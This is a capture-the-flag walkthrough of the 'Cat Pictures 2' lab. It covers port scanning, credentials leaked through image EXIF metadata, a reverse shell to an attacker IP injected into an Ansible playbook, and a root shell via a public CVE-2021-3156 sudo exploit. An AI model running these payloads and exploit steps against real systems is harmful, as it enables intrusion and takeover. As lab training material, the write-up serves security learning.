Cat Pictures 2
1. Reconnaissance & Enumeration
1.1 Initial Port Scan
export TARGET_IP=10.10.130.75
nmap -p- --min-rate 5000 $TARGET_IP
Results:
Not shown: 65292 closed tcp ports (reset), 237 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
222/tcp  open  rsh-spx
1337/tcp open  waste
3000/tcp open  ppp
8080/tcp open  http-proxy
Note that the SERVICE column is only nmap's port-name lookup, not a fingerprint: "waste", "ppp" and "rsh-spx" are just the names nmap associates with those port numbers. Running -sV against the six open ports (or simply browsing them) is what actually identifies Gitea on 3000, the OliveTin Ansible runner on 1337 and a second web server on 8080, as the rest of the enumeration shows.
1.2 Website Enumeration & Metadata Extraction
Browsing to http://10.10.130.75 reveals a website displaying cat pictures. The description of the first image contains a comment, "note to self: strip metadata", which strongly suggests that the uploaded images still carry EXIF data worth reading.
We download one of the images and use exiftool to extract its metadata:
wget http://10.10.130.75/uploads/medium/f5054e97620f168c7b5088c85ab1d6e4.jpg
exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg
Key Finding:
The Title field in the EXIF data contains :8080/764efa883dda1e11db47671c4a3bbd9e.txt, i.e. a port and a path with the host omitted. Appended to the target address, this points to a hidden file served on port 8080. Only one image was inspected here; running exiftool over every file under /uploads/ is the obvious follow-up, since other images may carry different notes.
1.3 Hidden File Retrieval
We access the revealed URL: http://10.10.130.75:8080/764efa883dda1e11db47671c4a3bbd9e.txt
Contents:
I setup an internal gitea instance to start using IaC for this server. It's at a quite basic state, but I'm putting the password here because I will definitely forget.
This file isn't easy to find anyway unless you have the correct url...
gitea: port 3000
user: samarium
password: TUmhyZ37CLZrhP
ansible runner (olivetin): port 1337
Analysis:
- Gitea Instance: A self-hosted Git service (similar to GitHub) is running on port 3000, and the note gives us a login for it: user samarium, password TUmhyZ37CLZrhP.
- Ansible Runner: OliveTin, a web front-end for running predefined commands such as Ansible playbooks, is accessible on port 1337. Since it executes infrastructure code taken from the Gitea repository, write access to that repository is effectively code execution on the box.
2. Exploitation
2.1 Gitea Access & Flag 1
Using the discovered credentials, we log in to the Gitea instance at http://10.10.130.75:3000. The samarium/ansible repository contains flag1.txt at the root of the main branch.
- Flag 1 Location: http://10.10.130.75:3000/samarium/ansible/src/branch/main/flag1.txt
2.2 Ansible Playbook Manipulation & Reverse Shell
The Gitea repository contains an Ansible playbook (playbook.yaml) which the Ansible runner on port 1337 executes against the host. Because we can push to the repository, we control what the runner executes: a classic code injection through a trusted IaC pipeline. One detail matters for the payload: Ansible's command module runs its argument directly, without a shell, so bash-only syntax such as the /dev/tcp redirection has to be wrapped in bash -c (or the task switched to the shell module).
Modified Playbook (Reverse Shell Injection):
---
- name: Test
  hosts: all # Define all the hosts
  remote_user: bismuth
  # Defining the Ansible task
  tasks:
    - name: get the username running the deploy
      become: false
      command: bash -c "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1"
      register: username_on_the_host
      changed_when: false
    - debug: var=username_on_the_host
    - name: Test
      shell: echo hi
Steps:
- Modify playbook.yaml: Update the playbook in the Gitea repository with the reverse shell task shown above and commit it to the main branch.
- Start Listener: On your attacking machine, start a Netcat listener:
nc -lvnp 6666
- Trigger Playbook: Navigate to http://10.10.130.75:1337/ and click the "Run Ansible Playbook" button.
- Receive Shell: Your Netcat listener should receive a connection, giving you a shell as the bismuth user (the remote_user the playbook runs as). The playbook run will appear to hang while the shell is open, because the task waits for the command to return; the debug and echo tasks only run once you disconnect. Note also that bismuth is a member of adm, which is worth remembering when looking for readable logs later.
# Attacker Machine
nc -lvnp 6666
# (After triggering the playbook)
# Connection received!
id # uid=1000(bismuth) gid=1000(bismuth) groups=1000(bismuth),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare)
3. Privilege Escalation
3.1 Local Enumeration with LinPEAS
To identify potential privilege escalation paths, we'll use LinPEAS, a comprehensive enumeration script.
Steps:
- Download LinPEAS: Obtain linpeas.sh from the official PEASS-ng repository: https://github.com/carlospolop/PEASS-ng/releases
- Transfer to Target:
- Attacker Machine: Start a simple HTTP server in the directory holding linpeas.sh (binding port 80 requires root; any high port works if you adjust the URL below accordingly):
python3 -m http.server 80
- Target Machine (bismuth shell): Download LinPEAS:
wget http://10.2.17.44/linpeas.sh
- Target Machine: Make it executable:
chmod +x linpeas.sh
- Run LinPEAS: Execute the script:
./linpeas.sh
3.2 Identifying the Vulnerability
LinPEAS output highlights a vulnerable sudo version: Sudo version 1.8.21p2. This release falls inside the range affected by CVE-2021-3156 ("Baron Samedit"), a heap-based buffer overflow in sudo's command-line argument handling that lets any local user escalate to root, whether or not they have a sudoers entry.
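The version LinPEAS flags can be double-checked without trusting the banner alone. The script below is an added example, not part of the writeup, of LinPEAS or of the exploit: it encodes the affected ranges from the Qualys advisory for CVE-2021-3156 (legacy 1.8.2 to 1.8.31p2, stable 1.9.0 to 1.9.5p1) and classifies the output of the advisory's own runtime test, sudoedit -s /, which prints "sudoedit: /: not a regular file" on an unpatched build and a usage message on a patched one. The fallback version string and the sample outputs it handles are constructed.

```shell
#!/bin/sh
# Added example (not from the writeup): decide whether a sudo version string
# falls inside the CVE-2021-3156 "Baron Samedit" affected ranges from the
# Qualys advisory (legacy 1.8.2 to 1.8.31p2, stable 1.9.0 to 1.9.5p1), and
# classify the output of the advisory's behavioural test, "sudoedit -s /".

# Map "1.8.21p2" (optionally prefixed with "Sudo version ") to one integer so
# ranges can be compared with -ge/-le. Layout: major*1e7 + minor*1e5 +
# patch*100 + p-level; sudo's minor, patch and p numbers fit those widths.
sudo_version_key() {
    v="${1#Sudo version }"
    plevel=0
    case "$v" in
        *p*) plevel="${v##*p}"; v="${v%p*}" ;;
    esac
    major="${v%%.*}"
    rest="${v#*.}"
    minor="${rest%%.*}"
    if [ "$rest" = "$minor" ]; then
        patch=0                      # "1.8" style version with no third field
    else
        patch="${rest#*.}"
    fi
    echo $(( major * 10000000 + minor * 100000 + patch * 100 + plevel ))
}

# Exit status 0 when the version is in an affected range, 1 otherwise.
is_baron_samedit_vuln() {
    k=$(sudo_version_key "$1")
    if [ "$k" -ge "$(sudo_version_key 1.8.2)" ] && [ "$k" -le "$(sudo_version_key 1.8.31p2)" ]; then
        return 0
    fi
    if [ "$k" -ge "$(sudo_version_key 1.9.0)" ] && [ "$k" -le "$(sudo_version_key 1.9.5p1)" ]; then
        return 0
    fi
    return 1
}

# The advisory's runtime check: an unpatched sudo reaches the vulnerable
# argument handling and prints "sudoedit: /: not a regular file"; a patched
# build refuses -s for sudoedit and prints its usage text instead.
classify_sudoedit_output() {
    case "$1" in
        *"not a regular file"*) echo vulnerable ;;
        *usage:*)               echo patched ;;
        *)                      echo unknown ;;
    esac
}

# Stand-alone run: use the local sudo banner if one is available, otherwise
# fall back to the version LinPEAS reported on the target (constructed input).
main() {
    ver=""
    if command -v sudo >/dev/null 2>&1; then
        ver=$(sudo --version 2>/dev/null | head -n 1)
    fi
    case "$ver" in
        "Sudo version "*) ;;                        # recognised banner
        *) ver="Sudo version 1.8.21p2" ;;           # constructed fallback
    esac
    if is_baron_samedit_vuln "$ver"; then
        echo "$ver: inside the CVE-2021-3156 affected range; confirm with: sudoedit -s /"
    else
        echo "$ver: outside the CVE-2021-3156 affected range"
    fi
}

main "$@"
```

On the target, run it from the bismuth shell; the version check is only a range lookup, so follow it with the behavioural test by passing the real output to the classifier, e.g. classify_sudoedit_output "$(sudoedit -s / 2>&1)". A result of vulnerable means the unpatched code path is reachable regardless of what the package version string claims, which matters on distributions that backport fixes without bumping the upstream version.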
3.3 Exploiting CVE-2021-3156
We'll use a publicly available exploit for CVE-2021-3156. It has to be compiled on the target (or on a box with the same distribution, sudo build and libc), so check that gcc and make are present there first; the exploit also carries hard-coded per-target offsets, which is why a target index is passed on the command line.
Steps:
- Obtain Exploit: Clone the exploit repository from GitHub:
Attacker Machine
git clone https://github.com/blasty/CVE-2021-3156
- Prepare for Transfer: Create a tar archive for easier transfer:
Attacker Machine
tar -cvf exploit.tar CVE-2021-3156
python3 -m http.server 80 # If not already running
- Transfer and Extract:
Target Machine
cd /tmp # World-writable; if /tmp is mounted noexec, use /dev/shm or the user's home instead
wget http://10.2.17.44/exploit.tar
tar xopf exploit.tar
cd CVE-2021-3156
- Compile and Run:
Target Machine
make
./sudo-hax-me-a-sandwich 0 # Run with target 0 (check available targets with ./sudo-hax-me-a-sandwich)
3.4 Root Shell and Flag 3
If the exploit is successful, you should obtain a root shell.
id # uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1000(bismuth)
cat /root/flag3.txt # Retrieve the final flag